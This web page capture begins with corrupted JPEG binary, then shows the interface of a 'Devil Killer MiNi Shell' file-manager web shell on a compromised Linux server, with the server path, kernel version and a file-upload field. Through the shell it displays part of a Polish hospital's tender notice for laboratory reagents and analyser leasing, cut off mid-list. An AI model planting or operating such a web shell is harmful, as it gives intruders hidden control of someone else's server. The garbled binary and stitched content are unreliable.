JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240325/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240325/0025868201-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa odczynników </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zespół Opieki Zdrowotnej w Lidzbarku Warmińskim</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000308459</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Kardynała Stefana Wyszyńskiego 37</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lidzbark Warmiński</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">11-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@zozlw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zozlw.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa odczynników </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5932fff9-eaa2-11ee-b4e0-4ac387c144e3</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00258682</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-03-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00075642/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Dostawa odczynników laboratoryjnych wraz z dzierżawą analizatorów do Medycznego Laboratorium Diagnostycznego Zespołu Opieki Zdrowotnej w Lidzbarku Warmińskim</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/905707 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/transakcja/905707</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem platformazakupowa.pl pod adresem: https://platformazakupowa.pl/transakcja/905707 <br/>2.	W celu skrócenia czasu udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między zamawiającym a wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do zamawiającego”. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po których pojawi się komunikat, że wiadomość została wysłana do zamawiającego.<br/>3.	Zamawiający będzie przekazywał wykonawcom informacje w formie elektronicznej za pośrednictwem platformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem platformazakupowa.pl do konkretnego wykonawcy.<br/>4.	Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na platformazakupowa.pl przesłanych przez zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl/transakcja/905707</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>1.	administratorem Pani/Pana danych osobowych jest Zespół Opieki Zdrowotnej w Lidzbarku Warmińskim;<br/>2.	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego na Dostawę odczynników do koagulologii wraz z dzierżawą analizatora, odczynników do badań serologicznych wraz z dzierżawą systemu do oznaczeń metodą mikrokolumnową oraz odczynniki do CRP kompatybilnego z analizatorem EPOLL 20, prowadzonym w trybie podstawowym;<br/>3.	dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (t. j. Dz. U. z 2023 r. poz. 1650 z późn. zm.), dalej „ustawa Pzp”; <br/>4.	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 4 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>5.	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>6.	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>7.	posiada Pani/Pan:<br/>1)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>2)	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych *;<br/>3)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **; <br/>4)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9.	nie przysługuje Pani/Panu:<br/>1)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>2)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>3)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>1.	administratorem Pani/Pana danych osobowych jest Zespół Opieki Zdrowotnej w Lidzbarku Warmińskim;<br/>2.	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego na Dostawę odczynników do koagulologii wraz z dzierżawą analizatora, odczynników do badań serologicznych wraz z dzierżawą systemu do oznaczeń metodą mikrokolumnową oraz odczynniki do CRP kompatybilnego z analizatorem EPOLL 20, prowadzonym w trybie podstawowym;<br/>3.	dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (t. j. Dz. U. z 2023 r. poz. 1650 z późn. zm.), dalej „ustawa Pzp”; <br/>4.	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 4 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>5.	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>6.	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>7.	posiada Pani/Pan:<br/>1)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>2)	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych *;<br/>3)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **; <br/>4)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9.	nie przysługuje Pani/Panu:<br/>1)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>2)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>3)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZOZ.V.260-38/ZP/24</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia Dostawa odczynników do koagulologii wraz z dzierżawą analizatora, odczynników do badań serologicznych wraz z dzierżawą systemu do oznaczeń metodą mikrokolumnową oraz odczynników do CRP kompatybilnych z analizatorem EPOLL 20.<br/>2.	Szczegółowy opis przedmiotu zamówienia, asortyment i ilości zawiera Formularz cenowy stanowiący zał. Nr 5 do SWZ.<br/>3.	Szczegółowe wymagania dotyczące dzierżawy analizatorów znajdują się w:<br/>1.	System do oznaczeń serologicznych metodą mikrokolumnową - wymagania, stanowiącej załącznik Nr 6 do SWZ<br/>2.	Analizator do Kogulologii, stanowiącej załącznik Nr 7 do SWZ<br/>4.	Zamawiający przewiduje możliwość mniejszej realizacji przedmiotu zamówienia, nie mniej niż 60% wartości każdej części określonej w umowie z Wykonawcą.<br/>5.	Zamawiający zastrzega sobie prawo do zmian ilościowych w ramach danej części zamówienia do granicy wartości podpisanej umowy na daną część.<br/>6.	Zamawiający wymaga realizacji dostaw odczynników maksymalnie w ciągu 5 dni roboczych, w godz. od 8:00-18:00 od poniedziałku do piątku licząc od momentu złożenia zamówienia.<br/>7.	Terminy dostaw do 3 dni roboczych licząc od dnia złożenia zamówienia są dodatkowo oceniane.<br/>8.	Określając ilość opakowań oferowanego asortymentu w Formularzu cenowym, w kolumnach pn. „ilość zaoferowanych opakowań” należy uwzględnić także termin ważności asortymentu określony przez Wykonawcę w kolumnie pn.„deklarowany przez Wykonawcę okres ważności oferowanego asortymentu w msc od daty dostawy” a także okres ważności asortymentu po jego otwarciu (jeśli dotyczy).”<br/>9. Dostawa, instalacja i podłączenie analizatora do informatycznego systemu laboratoryjnego (jeśli dotyczy) w ciągu 5 dni roboczych od podpisania umowy. Koszt podłączenia do informatycznego systemu laboratoryjnego po stronie Wykonawcy.<br/>10.	W przypadku odczynników do badań serologicznych wraz z dzierżawą systemu do oznaczeń metodą mikrokolumnową zamówienia będą składane według ustalonego harmonogramu.<br/>11.	W przypadku zaoferowania przez Wykonawcę wyrobów w opakowaniach o innej wielkości niż określona w załączniku nr 5 do SWZ, na Wykonawcy ciąży obowiązek prawidłowej kalkulacji ilości opakowań. W sytuacji, gdy nie jest możliwa dostawa dokładnej ilości zapotrzebowanych wyrobów z uwagi na sposób ich konfekcjonowania u Wykonawców, Zamawiający dopuszcza modyfikację ich ilości przy zastosowaniu zasady zaokrąglania w górę, tj. kalkulacji takiej ilości sztuk (opakowań), którą Zamawiający będzie musiał zakupić, aby zostało zrealizowane jego zapotrzebowanie, przy założeniu powstania pewnej nadwyżki.<br/>12.	Wszystkie oferowane przedmioty, które są zaklasyfikowane jako wyroby medyczne do diagnostyki in vitro muszę spełniać wymogi ustawy o wyrobach medycznych (deklaracje, certyfikaty, kody UDI). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33696500-0 - Odczynniki laboratoryjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-07-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy odczynników</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia Dostawa odczynników do koagulologii wraz z dzierżawą analizatora, odczynników do badań serologicznych wraz z dzierżawą systemu do oznaczeń metodą mikrokolumnową oraz odczynników do CRP kompatybilnych z analizatorem EPOLL 20.<br/>2.	Szczegółowy opis przedmiotu zamówienia, asortyment i ilości zawiera Formularz cenowy stanowiący zał. Nr 5 do SWZ.<br/>3.	Szczegółowe wymagania dotyczące dzierżawy analizatorów znajdują się w:<br/>1.	System do oznaczeń serologicznych metodą mikrokolumnową - wymagania, stanowiącej załącznik Nr 6 do SWZ<br/>2.	Analizator do Kogulologii, stanowiącej załącznik Nr 7 do SWZ<br/>4.	Zamawiający przewiduje możliwość mniejszej realizacji przedmiotu zamówienia, nie mniej niż 60% wartości każdej części określonej w umowie z Wykonawcą.<br/>5.	Zamawiający zastrzega sobie prawo do zmian ilościowych w ramach danej części zamówienia do granicy wartości podpisanej umowy na daną część.<br/>6.	Zamawiający wymaga realizacji dostaw odczynników maksymalnie w ciągu 5 dni roboczych, w godz. od 8:00-18:00 od poniedziałku do piątku licząc od momentu złożenia zamówienia.<br/>7.	Terminy dostaw do 3 dni roboczych licząc od dnia złożenia zamówienia są dodatkowo oceniane.<br/>8.	Określając ilość opakowań oferowanego asortymentu w Formularzu cenowym, w kolumnach pn. „ilość zaoferowanych opakowań” należy uwzględnić także termin ważności asortymentu określony przez Wykonawcę w kolumnie pn.„deklarowany przez Wykonawcę okres ważności oferowanego asortymentu w msc od daty dostawy” a także okres ważności asortymentu po jego otwarciu (jeśli dotyczy).”<br/>9. Dostawa, instalacja i podłączenie analizatora do informatycznego systemu laboratoryjnego (jeśli dotyczy) w ciągu 5 dni roboczych od podpisania umowy. Koszt podłączenia do informatycznego systemu laboratoryjnego po stronie Wykonawcy.<br/>10.	W przypadku odczynników do badań serologicznych wraz z dzierżawą systemu do oznaczeń metodą mikrokolumnową zamówienia będą składane według ustalonego harmonogramu.<br/>11.	W przypadku zaoferowania przez Wykonawcę wyrobów w opakowaniach o innej wielkości niż określona w załączniku nr 5 do SWZ, na Wykonawcy ciąży obowiązek prawidłowej kalkulacji ilości opakowań. W sytuacji, gdy nie jest możliwa dostawa dokładnej ilości zapotrzebowanych wyrobów z uwagi na sposób ich konfekcjonowania u Wykonawców, Zamawiający dopuszcza modyfikację ich ilości przy zastosowaniu zasady zaokrąglania w górę, tj. kalkulacji takiej ilości sztuk (opakowań), którą Zamawiający będzie musiał zakupić, aby zostało zrealizowane jego zapotrzebowanie, przy założeniu powstania pewnej nadwyżki.<br/>12.	Wszystkie oferowane przedmioty, które są zaklasyfikowane jako wyroby medyczne do diagnostyki in vitro muszę spełniać wymogi ustawy o wyrobach medycznych (deklaracje, certyfikaty, kody UDI). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33696500-0 - Odczynniki laboratoryjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">38434000-6 - Analizatory</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-07-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy odczynników</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia Dostawa odczynników do koagulologii wraz z dzierżawą analizatora, odczynników do badań serologicznych wraz z dzierżawą systemu do oznaczeń metodą mikrokolumnową oraz odczynników do CRP kompatybilnych z analizatorem EPOLL 20.<br/>2.	Szczegółowy opis przedmiotu zamówienia, asortyment i ilości zawiera Formularz cenowy stanowiący zał. Nr 5 do SWZ.<br/>3.	Szczegółowe wymagania dotyczące dzierżawy analizatorów znajdują się w:<br/>1.	System do oznaczeń serologicznych metodą mikrokolumnową - wymagania, stanowiącej załącznik Nr 6 do SWZ<br/>2.	